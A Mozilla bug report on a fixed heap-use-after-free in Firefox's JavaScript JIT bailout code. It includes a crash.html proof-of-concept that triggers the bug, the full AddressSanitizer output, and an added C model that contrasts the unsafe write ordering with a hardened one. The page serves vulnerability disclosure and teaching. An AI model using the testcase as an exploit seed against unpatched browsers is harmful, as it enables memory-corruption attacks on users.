Closed Bug 1309223 Opened 9 years ago Closed 9 years ago

heap-use-after-free in BaselineStackBuilder

Categories

(Core :: JavaScript Engine: JIT, defect)

Type: defect
Priority: Not set
Severity: normal

Tracking

RESOLVED DUPLICATE of bug 1308556
Tracking Status
firefox52 --- fixed

People

(Reporter: nils, Unassigned)

Details

(Keywords: csectype-uaf, reporter-external, sec-critical, Whiteboard: [adv-main52-])

Attachments

(1 file)

Attached file crash.html
The following testcase crashes the latest ASAN build of Firefox (BuildID=20161011100146).

crash.html:

<script>
function f2(r) { return r+r; }
function f1(a) { return f2(a); }
for(var x=0;x<2000;x++) f1([1]);
f1(undefined,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,
   0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead,0xdead);
</script>

ASAN output:

=================================================================
==12692==ERROR: AddressSanitizer: heap-use-after-free on address 0x619000c0b5e0 at pc 0x7fdedcc557a8 bp 0x7fffa8c70310 sp 0x7fffa8c70308
READ of size 8 at 0x619000c0b5e0 thread T0 (Web Content)
    #0 0x7fdedcc557a7 in write<JS::Value> /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:203:9
    #1 0x7fdedcc557a7 in writeValue /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:236
    #2 0x7fdedcc557a7 in InitFromBailout /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:1279
    #3 0x7fdedcc557a7 in js::jit::BailoutIonToBaseline(JSContext*, js::jit::JitActivation*, js::jit::JitFrameIterator&, bool, js::jit::BaselineBailoutInfo**, js::jit::ExceptionBailoutInfo const*) /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:1572
    #4 0x7fdedcc3d6bd in js::jit::Bailout(js::jit::BailoutStack*, js::jit::BaselineBailoutInfo**) /home/worker/workspace/build/src/js/src/jit/Bailouts.cpp:55:23
    #5 0x7fdec063c48e (<unknown module>)

0x619000c0b5e0 is located 864 bytes inside of 1024-byte region [0x619000c0b280,0x619000c0b680)
freed by thread T0 (Web Content) here:
    #0 0x4b215b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7fdedcc4e0ae in js_free /home/worker/workspace/build/src/obj-firefox/dist/include/js/Utility.h:257:5
    #2 0x7fdedcc4e0ae in enlarge /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:149
    #3 0x7fdedcc4e0ae in subtract /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:182
    #4 0x7fdedcc4e0ae in write<JS::Value> /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:201
    #5 0x7fdedcc4e0ae in writeValue /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:236
    #6 0x7fdedcc4e0ae in InitFromBailout /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:1279
    #7 0x7fdedcc4e0ae in js::jit::BailoutIonToBaseline(JSContext*, js::jit::JitActivation*, js::jit::JitFrameIterator&, bool, js::jit::BaselineBailoutInfo**, js::jit::ExceptionBailoutInfo const*) /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:1572
    #8 0x7fdedcc3d6bd in js::jit::Bailout(js::jit::BailoutStack*, js::jit::BaselineBailoutInfo**) /home/worker/workspace/build/src/js/src/jit/Bailouts.cpp:55:23
    #9 0x7fdec063c48e (<unknown module>)
    #10 0x7fdec063c887 (<unknown module>)

previously allocated by thread T0 (Web Content) here:
    #0 0x4b2604 in calloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:66:3
    #1 0x7fdedcc4565f in js_calloc /home/worker/workspace/build/src/obj-firefox/dist/include/js/Utility.h:235:12
    #2 0x7fdedcc4565f in init /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:117
    #3 0x7fdedcc4565f in js::jit::BailoutIonToBaseline(JSContext*, js::jit::JitActivation*, js::jit::JitFrameIterator&, bool, js::jit::BaselineBailoutInfo**, js::jit::ExceptionBailoutInfo const*) /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:1508
    #4 0x7fdedcc3d6bd in js::jit::Bailout(js::jit::BailoutStack*, js::jit::BaselineBailoutInfo**) /home/worker/workspace/build/src/js/src/jit/Bailouts.cpp:55:23
    #5 0x7fdec063c48e (<unknown module>)
    #6 0x7fdec063c887 (<unknown module>)

SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/js/src/jit/BaselineBailouts.cpp:203:9 in write<JS::Value>
Shadow bytes around the buggy address:
  0x0c3280179660: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3280179670: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3280179680: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c3280179690: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c32801796a0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c32801796b0: fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd fd fd
  0x0c32801796c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c32801796d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c32801796e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c32801796f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c3280179700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==12692==ABORTING
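The two stacks in the ASan report describe the bug's shape on their own. In the "freed by" stack, frame #4 is write<JS::Value> at BaselineBailouts.cpp:201 calling subtract (#3), which calls enlarge (#2), which calls js_free on the 1024-byte buffer that init had calloc'd; the faulting 8-byte read is two lines later, at line 203 of the same write<JS::Value> call, 864 bytes inside the region that enlarge had just freed. In other words, a growable buffer was replaced in the middle of a write while the writer still held a pointer into the old block. The C model below is an added example written for this page, not SpiderMonkey code; the struct, field and function names are invented, and it assumes (an inference from the read size and the freed offset, not something the report states) that the 8-byte source being copied lived inside the builder's own buffer. It shows the unsafe ordering from the trace next to a hardened writer that reads the source before anything can free it, and an aliasing check a debug assertion could use.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef uint64_t Value; /* 8-byte stand-in for JS::Value (the trace reads 8 bytes) */

/* Constructed model of a frame builder that fills a heap block from its top
 * end downward and reallocates when full. Names are invented for this
 * example and are not SpiderMonkey's. */
typedef struct {
    uint8_t *buf;      /* calloc'd block, freed and replaced by sb_enlarge() */
    size_t   total;    /* size of buf in bytes */
    size_t   used;     /* bytes occupied at the top end of buf */
    uint8_t *bottom;   /* buf + total - used: lowest written address */
    unsigned enlarges; /* how many times the block was replaced */
} StackBuilder;

static bool sb_init(StackBuilder *sb, size_t total) {
    sb->buf = calloc(total, 1);
    if (!sb->buf) return false;
    sb->total = total; sb->used = 0; sb->enlarges = 0;
    sb->bottom = sb->buf + total;
    return true;
}

/* Double the block, move the written bytes to the top of the new one and
 * free the old one: every pointer into the old block now dangles. */
static bool sb_enlarge(StackBuilder *sb) {
    size_t ntotal = sb->total * 2;
    uint8_t *nbuf = calloc(ntotal, 1);
    if (!nbuf) return false;
    memcpy(nbuf + ntotal - sb->used, sb->bottom, sb->used);
    free(sb->buf);
    sb->buf = nbuf; sb->total = ntotal;
    sb->bottom = nbuf + ntotal - sb->used;
    sb->enlarges++;
    return true;
}

/* Reserve size bytes below bottom, enlarging as needed (the trace's subtract). */
static bool sb_subtract(StackBuilder *sb, size_t size) {
    while (size > sb->total - sb->used)
        if (!sb_enlarge(sb)) return false;
    sb->bottom -= size; sb->used += size;
    return true;
}

/* True if p points into the live region [bottom, buf + total). */
static bool sb_aliases(const StackBuilder *sb, const void *p) {
    uintptr_t a = (uintptr_t)p;
    return a >= (uintptr_t)sb->bottom && a < (uintptr_t)(sb->buf + sb->total);
}

/* The ordering in the trace: reserve first (which may free the block), then
 * read *src. Correct only while src points outside the builder's own block. */
static bool sb_write_unsafe(StackBuilder *sb, const Value *src) {
    if (!sb_subtract(sb, sizeof(Value))) return false; /* may free sb->buf */
    memcpy(sb->bottom, src, sizeof(Value));             /* src may now dangle */
    return true;
}

/* Hardened: copy the value out before anything can free the block. */
static bool sb_write_safe(StackBuilder *sb, const Value *src) {
    Value v = *src;                                     /* src still valid here */
    if (!sb_subtract(sb, sizeof(Value))) return false;
    memcpy(sb->bottom, &v, sizeof(Value));
    return true;
}

/* n-th value counted from the top of the block (0 = first written). */
static Value sb_value_from_top(const StackBuilder *sb, size_t n) {
    Value v;
    memcpy(&v, sb->buf + sb->total - (n + 1) * sizeof(Value), sizeof(Value));
    return v;
}

/* Fill a 4-slot block from stack locals (safe even with the unsafe writer),
 * then re-push the first value by pointer to its own slot. That push is one
 * slot over capacity, so subtract() enlarges and frees the block the source
 * lives in. The hardened writer still lands 0x1000 in the new slot; the
 * unsafe writer would read freed memory at that point. */
static Value scenario_repush(unsigned *enlarges_out) {
    StackBuilder sb;
    if (!sb_init(&sb, 4 * sizeof(Value))) return 0;
    for (Value v = 0x1000; v < 0x1004; v++) sb_write_unsafe(&sb, &v);
    const Value *slot = (const Value *)(sb.buf + sb.total - sizeof(Value));
    bool aliases = sb_aliases(&sb, slot);  /* true: this is the dangerous case */
    sb_write_safe(&sb, slot);              /* enlarges, frees old block, still correct */
    Value got = sb_value_from_top(&sb, 4);
    if (enlarges_out) *enlarges_out = sb.enlarges;
    free(sb.buf);
    return aliases ? got : 0;
}

static unsigned scenario_repush_enlarges(void) {
    unsigned n = 0;
    (void)scenario_repush(&n);
    return n;
}

int main(void) {
    printf("re-push through hardened writer: 0x%llx after %u enlarge(s)\n",
           (unsigned long long)scenario_repush(NULL), scenario_repush_enlarges());
    return 0;
}
```

Build it with -fsanitize=address and swap the re-push in scenario_repush to sb_write_unsafe to reproduce the report's signature in miniature: a heap-use-after-free READ of size 8 inside the writer, freed by enlarge called from subtract called from the same writer. The fix pattern is the ordering in sb_write_safe, or equivalently an assertion built on sb_aliases before the reserve; either way nothing may hold a pointer into the block across a call that can replace it.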
Group: core-security → javascript-core-security
Flags: needinfo?(jdemooij)
Hi Nils, I think this is a duplicate of bug 1308556. I landed a patch for that a few days ago. Can you confirm this works with the latest ASan builds?
Flags: needinfo?(jdemooij) → needinfo?(nils)
Hi Jan, I can confirm that it doesn't repro with a build from today anymore \o/ Out of interest could you cc me on that bug?
Flags: needinfo?(nils)
(In reply to Nils from comment #2)
> Hi Jan, I can confirm that it doesn't repro with a build from today anymore
> \o/

Great, thanks.

> Out of interest could you cc me on that bug?

Done.
Status: NEW → RESOLVED
Closed: 9 years ago
Resolution: --- → DUPLICATE
Flags: sec-bounty?
Flags: sec-bounty? → sec-bounty-
Updating status in 52 per comment 2 and bug 1308556.
Whiteboard: [adv-main52-]
Group: javascript-core-security